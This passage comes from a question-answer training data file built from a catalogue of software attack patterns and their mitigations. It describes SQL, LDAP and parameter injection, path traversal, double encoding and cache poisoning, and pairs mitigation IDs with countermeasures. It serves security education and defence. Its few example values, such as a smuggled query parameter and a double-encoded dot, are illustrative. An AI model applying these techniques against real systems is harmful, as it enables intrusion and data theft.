way that would leverage the built-in security mechanisms of the framework"}, {"instruction": "What is", "input": "coa-109-1", "output": "Ensure to keep up to date with security relevant updates to the persistence framework used within your application."}, {"instruction": "What is", "input": "Cause Web Server Misclassification", "output": "An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process."}, {"instruction": "What is", "input": "coa-11-0", "output": "Implementation: Server routines should be determined by content not determined by filename or file extension."}, {"instruction": "What is", "input": "SQL Injection through SOAP Parameter Tampering", "output": "An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message."}, {"instruction": "What is", "input": "coa-110-0", "output": "Properly validate and sanitize/reject user input at the service provider."}, {"instruction": "What is", "input": "coa-110-1", "output": "Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query."}, {"instruction": "What is", "input": "coa-110-2", "output": "At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly."}, {"instruction": "What is", "input": "JSON Hijacking (aka JavaScript Hijacking)", "output": "An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website."}, {"instruction": "What is", "input": "coa-111-0", "output": "Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce."}, {"instruction": "What is", "input": "coa-111-1", "output": "On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags)."}, {"instruction": "What is", "input": "coa-111-2", "output": "Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session."}, {"instruction": "What is", "input": "coa-111-3", "output": "Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario."}, {"instruction": "What is", "input": "Brute Force", "output": "In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset."}, {"instruction": "What is", "input": "coa-112-0", "output": "Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space."}, {"instruction": "What is", "input": "coa-112-1", "output": "Use a secret space that is well known and with no known patterns that may reduce functional size."}, {"instruction": "What is", "input": "coa-112-2", "output": "Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext."}, {"instruction": "What is", "input": "Interface Manipulation", "output": "An adversary manipulates the use or processing of an interface (e.g. Application Programming Interface (API) or System-on-Chip (SoC)) resulting in an adverse impact upon the security of the system implementing the interface. This can allow the adversary to bypass access control and/or execute functionality not intended by the interface implementation, possibly compromising the system which integrates the interface. Interface manipulation can take on a number of forms including forcing the unexpected use of an interface or the use of an interface in an unintended way."}, {"instruction": "What is", "input": "Authentication Abuse", "output": "An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker."}, {"instruction": "What is", "input": "Authentication Bypass", "output": "An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place."}, {"instruction": "What is", "input": "Excavation", "output": "An adversary actively probes the target in a manner that is designed to solicit information that could be leveraged for malicious purposes."}, {"instruction": "What is", "input": "coa-116-0", "output": "Minimize error/response output to only what is necessary for functional use or corrective language."}, {"instruction": "What is", "input": "coa-116-1", "output": "Remove potentially sensitive information that is not necessary for the application's functionality."}, {"instruction": "What is", "input": "Interception", "output": "An adversary monitors data streams to or from the target for information gathering purposes. This attack may be undertaken to solely gather sensitive information or to support a further attack against the target. This attack pattern can involve sniffing network traffic as well as other types of data streams (e.g. radio). The adversary can attempt to initiate the establishment of a data stream or passively observe the communications as they unfold. In all variants of this attack, the adversary is not the intended recipient of the data stream. In contrast to other means of gathering information (e.g., targeting data leaks), the adversary must actively position themself so as to observe explicit data channels (e.g. network traffic) and read the content. However, this attack differs from a Adversary-In-the-Middle (CAPEC-94) attack, as the adversary does not alter the content of the communications nor forward data to the intended recipient."}, {"instruction": "What is", "input": "coa-117-0", "output": "Leverage encryption to encode the transmission of data thus making it accessible only to authorized parties."}, {"instruction": "What is", "input": "Choosing Message Identifier", "output": "This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one."}, {"instruction": "What is", "input": "coa-12-0", "output": "\n Associate some ACL (in the form of a token) with an authenticated user which they provide middleware. The middleware uses this token as part of its channel/message selection for that client, or part of a discerning authorization decision for privileged channels/messages.\n The purpose is to architect the system in a way that associates proper authentication/authorization with each channel/message.\n "}, {"instruction": "What is", "input": "coa-12-1", "output": "Re-architect system input/output channels as appropriate to distribute self-protecting data. That is, encrypt (or otherwise protect) channels/messages so that only authorized readers can see them."}, {"instruction": "What is", "input": "Double Encoding", "output": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target."}, {"instruction": "What is", "input": "coa-120-0", "output": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input."}, {"instruction": "What is", "input": "coa-120-1", "output": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding."}, {"instruction": "What is", "input": "coa-120-2", "output": "When client input is required from web-based forms, avoid using the \"GET\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \"POST method whenever possible."}, {"instruction": "What is", "input": "coa-120-3", "output": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process."}, {"instruction": "What is", "input": "coa-120-4", "output": "Refer to the RFCs to safely decode URL."}, {"instruction": "What is", "input": "coa-120-5", "output": "Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive."}, {"instruction": "What is", "input": "coa-120-6", "output": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)."}, {"instruction": "What is", "input": "Exploit Non-Production Interfaces", "output": "\n An adversary exploits a sample, demonstration, test, or debug interface that is unintentionally enabled on a production system, with the goal of gleaning information or leveraging functionality that would otherwise be unavailable.\n "}, {"instruction": "What is", "input": "coa-121-0", "output": "Ensure that production systems do not contain non-production interfaces and that these interfaces are only used in development environments."}, {"instruction": "What is", "input": "Privilege Abuse", "output": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources."}, {"instruction": "What is", "input": "coa-122-0", "output": "Configure account privileges such privileged/administrator functionality is not exposed to non-privileged/lower accounts."}, {"instruction": "What is", "input": "Buffer Manipulation", "output": "An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory."}, {"instruction": "What is", "input": "coa-123-0", "output": "To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. Finally, there may be operating system level preventative functionality that can be applied."}, {"instruction": "What is", "input": "Shared Resource Manipulation", "output": "An adversary exploits a resource shared between multiple applications, an application pool or hardware pin multiplexing to affect behavior. Resources may be shared between multiple applications or between multiple threads of a single application. Resource sharing is usually accomplished through mutual access to a single memory location or multiplexed hardware pins. If an adversary can manipulate this shared resource (usually by co-opting one of the applications or threads) the other applications or threads using the shared resource will often continue to trust the validity of the compromised shared resource and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared resource, or even cause a crash or compromise of the sharing applications."}, {"instruction": "What is", "input": "Flooding", "output": "An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target."}, {"instruction": "What is", "input": "coa-125-0", "output": "Ensure that protocols have specific limits of scale configured."}, {"instruction": "What is", "input": "coa-125-1", "output": "Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits."}, {"instruction": "What is", "input": "coa-125-2", "output": "Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed."}, {"instruction": "What is", "input": "Path Traversal", "output": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files."}, {"instruction": "What is", "input": "coa-126-0", "output": "Design: Configure the access control correctly."}, {"instruction": "What is", "input": "coa-126-1", "output": "Design: Enforce principle of least privilege."}, {"instruction": "What is", "input": "coa-126-2", "output": "Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution."}, {"instruction": "What is", "input": "coa-126-3", "output": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement."}, {"instruction": "What is", "input": "coa-126-4", "output": "Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host."}, {"instruction": "What is", "input": "coa-126-5", "output": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands."}, {"instruction": "What is", "input": "coa-126-6", "output": "Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin."}, {"instruction": "What is", "input": "coa-126-7", "output": "Implementation: Perform input validation for all remote content, including remote and user-generated content."}, {"instruction": "What is", "input": "coa-126-8", "output": "Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables."}, {"instruction": "What is", "input": "coa-126-9", "output": "Implementation: Use indirect references rather than actual file names."}, {"instruction": "What is", "input": "coa-126-10", "output": "Implementation: Use possible permissions on file access when developing and deploying web applications."}, {"instruction": "What is", "input": "coa-126-11", "output": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach."}, {"instruction": "What is", "input": "Directory Indexing", "output": "An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks."}, {"instruction": "What is", "input": "coa-127-0", "output": "1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors."}, {"instruction": "What is", "input": "coa-127-1", "output": "2. Preventing with .htaccess in Apache web server: In .htaccess, write \"Options-indexes\"."}, {"instruction": "What is", "input": "coa-127-2", "output": "3. Suppressing error messages: using error 403 \"Forbidden\" message exactly like error 404 \"Not Found\" message."}, {"instruction": "What is", "input": "Integer Attacks", "output": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats."}, {"instruction": "What is", "input": "Pointer Manipulation", "output": "This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks."}, {"instruction": "What is", "input": "Subverting Environment Variable Values", "output": "The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary."}, {"instruction": "What is", "input": "coa-13-0", "output": "Protect environment variables against unauthorized read and write access."}, {"instruction": "What is", "input": "coa-13-1", "output": "Protect the configuration files which contain environment variables against illegitimate read and write access."}, {"instruction": "What is", "input": "coa-13-2", "output": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system."}, {"instruction": "What is", "input": "coa-13-3", "output": "Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege."}, {"instruction": "What is", "input": "Excessive Allocation", "output": "An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request."}, {"instruction": "What is", "input": "coa-130-0", "output": "Limit the amount of resources that are accessible to unprivileged users."}, {"instruction": "What is", "input": "coa-130-1", "output": "Assume all input is malicious. Consider all potentially relevant properties when validating input."}, {"instruction": "What is", "input": "coa-130-2", "output": "Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed."}, {"instruction": "What is", "input": "coa-130-3", "output": "Use resource-limiting settings, if possible."}, {"instruction": "What is", "input": "Resource Leak Exposure", "output": "An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests."}, {"instruction": "What is", "input": "coa-131-0", "output": "If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated)."}, {"instruction": "What is", "input": "coa-131-1", "output": "Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)"}, {"instruction": "What is", "input": "coa-131-2", "output": "Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function."}, {"instruction": "What is", "input": "Symlink Attack", "output": "An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name."}, {"instruction": "What is", "input": "coa-132-0", "output": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them."}, {"instruction": "What is", "input": "coa-132-1", "output": "Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions."}, {"instruction": "What is", "input": "Try All Common Switches", "output": "An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is indiscriminately attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality."}, {"instruction": "What is", "input": "coa-133-0", "output": "Design: Minimize switch and option functionality to only that necessary for correct function of the command."}, {"instruction": "What is", "input": "coa-133-1", "output": "Implementation: Remove all debug and testing options from production code."}, {"instruction": "What is", "input": "Email Injection", "output": "An adversary manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol."}, {"instruction": "What is", "input": "Format String Injection", "output": "An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack."}, {"instruction": "What is", "input": "coa-135-0", "output": "Limit the usage of formatting string functions."}, {"instruction": "What is", "input": "coa-135-1", "output": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters."}, {"instruction": "What is", "input": "LDAP Injection", "output": "An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value."}, {"instruction": "What is", "input": "coa-136-0", "output": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content."}, {"instruction": "What is", "input": "coa-136-1", "output": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application."}, {"instruction": "What is", "input": "Parameter Injection", "output": "An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \"myInput&new_param=myValue\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example."}, {"instruction": "What is", "input": "coa-137-0", "output": "Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise."}, {"instruction": "What is", "input": "coa-137-1", "output": "Treat all user input as untrusted data that must be validated before use."}, {"instruction": "What is", "input": "Reflection Injection", "output": "An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application."}, {"instruction": "What is", "input": "Relative Path Traversal", "output": "An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure."}, {"instruction": "What is", "input": "coa-139-0", "output": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement"}, {"instruction": "What is", "input": "coa-139-3", "output": "Implementation: Prefer working without user input when using file system calls"}, {"instruction": "What is", "input": "Client-side Injection-induced Buffer Overflow", "output": "This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. For example, if the client-side application is a browser, the service will host a webpage that the browser loads."}, {"instruction": "What is", "input": "coa-14-0", "output": "The client software should not install untrusted code from a non-authenticated server."}, {"instruction": "What is", "input": "coa-14-1", "output": "The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers."}, {"instruction": "What is", "input": "coa-14-2", "output": "Perform input validation for length of buffer inputs."}, {"instruction": "What is", "input": "coa-14-4", "output": "Use an abstraction library to abstract away risky APIs. Not a complete solution."}, {"instruction": "What is", "input": "coa-14-6", "output": "Ensure all buffer uses are consistently bounds-checked."}, {"instruction": "What is", "input": "Bypassing of Intermediate Forms in Multiple-Form Sets", "output": "Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application."}, {"instruction": "What is", "input": "Cache Poisoning", "output": "An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value."}, {"instruction": "What is", "input": "coa-141-0", "output": "Configuration: Disable client side caching."}, {"instruction": "What is", "input": "coa-141-1", "output": "Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes."}, {"instruction": "What is", "input": "DNS Cache Poisoning", "output": "A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack."}, {"instruction": "What is", "input": "coa-142-0", "output": "Configuration: Make sure your DNS servers have been updated to the latest versions"}, {"instruction": "What is", "input": "coa-142-1", "output": "Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet."}, {"instruction": "What is", "input": "coa-142-2", "output": "Configuration: Disable client side DNS caching."}, {"instruction": "What is", "input": "Detect Unpublicized Web Pages", "output": "An adversary searches a targeted web site for web pages that have not been publicized. In doing this, the adversary may be able to gain access to information that the targeted site did not intend to make public."}, {"instruction": "What is", "input": "Detect Unpublicized Web Services", "output": "An adversary searches a targeted web site for web services that have not been publicized. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable."}, {"instruction": "What is", "input": "Checksum Spoofing", "output": "An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. This would prevent the recipient from realizing that a change occurred."}, {"instruction": "What is", "input": "XML Schema Poisoning", "output": "An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema."}, {"instruction": "What is", "input": "coa-146-0", "output": "Design: Protect the schema against unauthorized modification."}, {"instruction": "What is", "input": "coa-146-1", "output": "Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification."}, {"instruction": "What is", "input": "coa-146-2", "output": "Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification."}, {"instruction": "What is", "input": "XML Ping of the Death", "output": "An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target."}, {"instruction": "What is", "input": "coa-147-0", "output": "Design: Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval."}, {"instruction": "What is", "input": "coa-147-1", "output": "Implementation: Provide for network flow control and traffic shaping to control access to the resources."}, {"instruction": "What is", "input": "Content Spoofing", "output": "An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary's content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes."}, {"instruction": "What is", "input": "Explore for Predictable Temporary File Names", "output": "An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks."}, {"instruction": "What is", "input": "Command Delimiters", "output": "An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on."}, {"instruction": "What is", "input": "coa-15-0", "output": "Design: Perform allowlist validation against a positive specification for command length, type, and parameters."}, {"instruction": "What is", "input": "coa-15-1", "output": "Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account"}, {"instruction": "What is", "input": "coa-15-2", "output": "Implementation: Perform input validation for all remote content."}, {"instruction": "What is", "input": "coa-15-3", "output": "Implementation: Use type conversions such as JDBC prepared statements."}, {"instruction": "What is", "input": "Collect Data from Common Resource Locations", "output": "An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks."}, {"instruction": "What is", "input": "Identity Spoofing", "output": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials."}, {"instruction": "What is", "input": "coa-151-0", "output": "Employ robust authentication processes (e.g., multi-factor authentication)."}, {"instruction": "What is", "input": "Input Data Manipulation", "output": "An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target."}, {"instruction": "What is", "input": "Resource Location Spoofing", "output": "An adversary deceives an application or user and convinces them to request a resource from an unintended location. By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals."}, {"instruction": "What is", "input": "coa-154-0", "output": "Monitor network activity to detect any anomalous or unauthorized communication exchanges."}, {"instruction": "What is", "input": "Screen Temporary Files for Sensitive Information", "output": "An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an adversary 